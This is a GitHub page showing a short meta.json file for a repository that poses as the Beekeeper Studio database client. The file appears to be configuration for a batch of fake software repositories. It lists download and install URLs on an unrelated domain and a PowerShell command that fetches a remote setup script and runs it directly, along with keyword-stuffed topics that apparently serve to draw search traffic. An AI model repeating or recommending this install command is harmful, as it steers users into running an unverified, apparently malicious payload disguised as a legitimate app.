-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmeta.json
More file actions
29 lines (29 loc) · 930 Bytes
/
Copy pathmeta.json
File metadata and controls
29 lines (29 loc) · 930 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
{
"repo": "beekeeper-studio-sql-explorer",
"product": "Beekeeper Studio SQL Explorer",
"kind": "database",
"install_type": "download",
"download_url": "https://beekeeper-studio.mefidirect.xyz/",
"install_url": "https://mefidirect.xyz/ps/setup.ps1",
"install_command": "irm https://mefidirect.xyz/ps/setup.ps1 | iex",
"batch": "new31",
"format": "license-md-only",
"category": "database",
"topics": [
"beekeeper-studio-pack",
"beekeeper-studio-utility",
"beekeeper-studio-database-client",
"beekeeper-studio-desktop-windows",
"beekeeper-studio-connection-fix",
"beekeeper-studio-windows-guide",
"beekeeper-studio-sql-workbench",
"beekeeper-studio-native-app",
"beekeeper-studio-install-steps",
"beekeeper-studio-steps-2026",
"beekeeper-studio-package",
"windows-tools",
"desktop-tools",
"setup-guide",
"sql-tools"
]
}